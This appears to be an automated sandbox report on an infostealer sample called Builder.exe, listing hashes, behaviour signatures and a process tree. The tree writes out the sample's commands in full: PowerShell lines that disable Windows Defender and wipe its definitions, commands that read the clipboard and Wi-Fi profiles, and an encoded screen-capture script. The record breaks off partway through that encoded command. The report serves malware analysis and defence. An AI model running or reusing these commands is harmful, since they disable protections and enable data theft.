Resubmissions

08-07-2024 14:42

240708-r28qlawfpe 10

18-06-2024 22:36

240618-2jdslsselj 10

18-06-2024 22:35

240618-2hrm3ssejm 10

Analysis

  • max time kernel
    253s
  • max time network
    202s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-07-2024 14:42

General

  • Target

    release/Builder.exe

  • Size

    12.3MB

  • MD5

    7639013f23201e1a8e5bc63ce3b42900

  • SHA1

    e62bb3f7c71ffbd469c5389056d8bd85b272c81f

  • SHA256

    86272927ebd3b2c56561d4276456db52fe15662092487ccf04042be2bfd7803c

  • SHA512

    431a4b6e138631ae5001e8424c7d5b4c089db500b242f95462d09a0d8a3b6043231665d6a4490f5534356cff73ec4ad58ab2b311e2f3a32179da0ee134213913

  • SSDEEP

    196608:2DFEJIJX9LM5gYT80Xukmqz5P0iak9/LiPnnQepeN/FJMIDJf0gsAGK4RouAKlPg:+JtLM2k8e3m2dak9/+c/Fqyf0gstDAKK

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\release\Builder.exe
    "C:\Users\Admin\AppData\Local\Temp\release\Builder.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1692
    • C:\Users\Admin\AppData\Local\Temp\release\Builder.exe
      "C:\Users\Admin\AppData\Local\Temp\release\Builder.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1080
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\release\Builder.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1428
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\release\Builder.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2236
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2320
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:224
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3684
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1896
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          PID:4832
          • C:\Users\Admin\AppData\Local\setup-.exe
            C:\Users\Admin\AppData\Local\setup-.exe hhwnd=1114574 hreturntoinstaller hextras=id:964bc9f9d4b9a45-US-error
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            PID:1448
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\H2OCleanup.bat""
              6⤵
                PID:3064
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist /FI "PID eq 1448" /fo csv
                  7⤵
                  • Enumerates processes with tasklist
                  PID:4016
                • C:\Windows\SysWOW64\find.exe
                  find /I "1448"
                  7⤵
                    PID:4836
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 5
                    7⤵
                    • Delays execution with timeout.exe
                    PID:4388
              • C:\Users\Admin\AppData\Local\setup-.exe
                C:\Users\Admin\AppData\Local\setup-.exe hready
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1604
              • C:\Users\Admin\AppData\Local\Temp\Steam.exe
                "C:\Users\Admin\AppData\Local\Temp\Steam.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:4568
              • C:\Users\Admin\AppData\Local\OperaGX.exe
                C:\Users\Admin\AppData\Local\OperaGX.exe --silent --allusers=0
                5⤵
                • Executes dropped EXE
                PID:2564
                • C:\Users\Admin\AppData\Local\Temp\7zS40ADB658\setup.exe
                  C:\Users\Admin\AppData\Local\Temp\7zS40ADB658\setup.exe --silent --allusers=0 --server-tracking-blob=MDAxOWJmNTIwMjFjODhiMzE1ODU4MzI5ZDc1N2Y5MTc1Nzc4NTAyZjYxYTZhODIwYTYwMTkyMjM2MTBmNjYyMzp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFHWFNldHVwLmV4ZSIsInByb2R1Y3QiOiJvcGVyYV9neCIsInF1ZXJ5IjoiL29wZXJhX2d4L3N0YWJsZS9lZGl0aW9uL3N0ZC0yP3V0bV9zb3VyY2U9UFdOZ2FtZXMmdXRtX21lZGl1bT1wYSZ1dG1fY2FtcGFpZ249UFdOX0dCX1BCNV8zNTc1JnV0bV9pZD1mYTY1MmNiNjEwYzk0NjhlYWZlZjg0NzQ5Y2QyYTg2YyZ1dG1fY29udGVudD0zNTc1X0ZpbGVETSIsInRpbWVzdGFtcCI6IjE3MjA0NDk4MDYuMjI0MCIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjI7IFdPVzY0OyBUcmlkZW50LzcuMDsgLk5FVDQuMEM7IC5ORVQ0LjBFOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgLk5FVCBDTFIgMy41LjMwNzI5KSIsInV0bSI6eyJjYW1wYWlnbiI6IlBXTl9HQl9QQjVfMzU3NSIsImNvbnRlbnQiOiIzNTc1X0ZpbGVETSIsImlkIjoiZmE2NTJjYjYxMGM5NDY4ZWFmZWY4NDc0OWNkMmE4NmMiLCJtZWRpdW0iOiJwYSIsInNvdXJjZSI6IlBXTmdhbWVzIn0sInV1aWQiOiI2MTZiZjBiZC0xZDhjLTQxYzEtYTM4MS1iNjQwNWZkMDdlZTkifQ==
                  6⤵
                  • Executes dropped EXE
                  • Enumerates connected drives
                  • Modifies system certificate store
                  PID:3628
                  • C:\Users\Admin\AppData\Local\Temp\7zS40ADB658\setup.exe
                    C:\Users\Admin\AppData\Local\Temp\7zS40ADB658\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=111.0.5168.54 --initial-client-data=0x300,0x32c,0x330,0x308,0x334,0x6db71138,0x6db71144,0x6db71150
                    7⤵
                    • Executes dropped EXE
                    PID:3604
                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe
                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe" --version
                    7⤵
                    • Executes dropped EXE
                    PID:1460
                  • C:\Users\Admin\AppData\Local\Temp\7zS40ADB658\setup.exe
                    "C:\Users\Admin\AppData\Local\Temp\7zS40ADB658\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --vought_browser=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=3628 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_20240708144329" --session-guid=bb1b8809-4677-4d10-ac65-6e0a3f4d3147 --server-tracking-blob=OTRkNTQ4YzcyMDM5YzViN2I4MDFhOTAzZDQxYjI5ZjNkZmI0YThjOTI1OTNiOTJmNDRhODc1YWJhNjgzYjBjMzp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFHWFNldHVwLmV4ZSIsInByb2R1Y3QiOnsibmFtZSI6Im9wZXJhX2d4In0sInF1ZXJ5IjoiL29wZXJhX2d4L3N0YWJsZS9lZGl0aW9uL3N0ZC0yP3V0bV9zb3VyY2U9UFdOZ2FtZXMmdXRtX21lZGl1bT1wYSZ1dG1fY2FtcGFpZ249UFdOX0dCX1BCNV8zNTc1JnV0bV9pZD1mYTY1MmNiNjEwYzk0NjhlYWZlZjg0NzQ5Y2QyYTg2YyZ1dG1fY29udGVudD0zNTc1X0ZpbGVETSIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMDQ0OTgwNi4yMjQwIiwidXNlcmFnZW50IjoiTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNy4wOyBXaW5kb3dzIE5UIDYuMjsgV09XNjQ7IFRyaWRlbnQvNy4wOyAuTkVUNC4wQzsgLk5FVDQuMEU7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy4wLjMwNzI5OyAuTkVUIENMUiAzLjUuMzA3MjkpIiwidXRtIjp7ImNhbXBhaWduIjoiUFdOX0dCX1BCNV8zNTc1IiwiY29udGVudCI6IjM1NzVfRmlsZURNIiwiaWQiOiJmYTY1MmNiNjEwYzk0NjhlYWZlZjg0NzQ5Y2QyYTg2YyIsIm1lZGl1bSI6InBhIiwic291cmNlIjoiUFdOZ2FtZXMifSwidXVpZCI6IjYxNmJmMGJkLTFkOGMtNDFjMS1hMzgxLWI2NDA1ZmQwN2VlOSJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=D405000000000000
                    7⤵
                    • Executes dropped EXE
                    • Enumerates connected drives
                    PID:1408
                    • C:\Users\Admin\AppData\Local\Temp\7zS40ADB658\setup.exe
                      C:\Users\Admin\AppData\Local\Temp\7zS40ADB658\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=111.0.5168.54 --initial-client-data=0x320,0x324,0x328,0x2f8,0x334,0x6cdc1138,0x6cdc1144,0x6cdc1150
                      8⤵
                      • Executes dropped EXE
                      PID:1432
                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202407081443291\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe
                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202407081443291\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:3672
                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202407081443291\assistant\assistant_installer.exe
                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202407081443291\assistant\assistant_installer.exe" --version
                    7⤵
                    • Executes dropped EXE
                    PID:4264
                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202407081443291\assistant\assistant_installer.exe
                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202407081443291\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=73.0.3856.382 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x3c4f48,0x3c4f58,0x3c4f64
                      8⤵
                      • Executes dropped EXE
                      PID:1444
              • C:\Users\Admin\AppData\Local\Temp\Steam.exe
                "C:\Users\Admin\AppData\Local\Temp\Steam.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:4248
              • C:\Users\Admin\AppData\Local\Temp\Steam.exe
                "C:\Users\Admin\AppData\Local\Temp\Steam.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:3888
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3364
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:3588
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4972
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic csproduct get uuid
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1076
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4056
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              4⤵
                PID:1824
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4860
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                4⤵
                  PID:2284
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2344
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  4⤵
                  • Detects videocard installed
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4176
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:208
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  4⤵
                  • Detects videocard installed
                  PID:1156
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​  ‌.scr'"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2172
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​  ‌.scr'
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:748
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4360
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:4828
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4016
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:5040
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                3⤵
                  PID:4212
                  • C:\Windows\System32\Wbem\WMIC.exe
                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    4⤵
                      PID:4240
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                    3⤵
                      PID:2848
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell Get-Clipboard
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4612
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      3⤵
                        PID:1640
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          4⤵
                          • Enumerates processes with tasklist
                          PID:4880
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:2896
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:2424
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                            3⤵
                              PID:2668
                              • C:\Windows\system32\netsh.exe
                                netsh wlan show profile
                                4⤵
                                • Event Triggered Execution: Netsh Helper DLL
                                PID:4588
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "systeminfo"
                              3⤵
                                PID:868
                                • C:\Windows\system32\systeminfo.exe
                                  systeminfo
                                  4⤵
                                  • Gathers system information
                                  PID:3240
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                3⤵
                                  PID:2416
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMA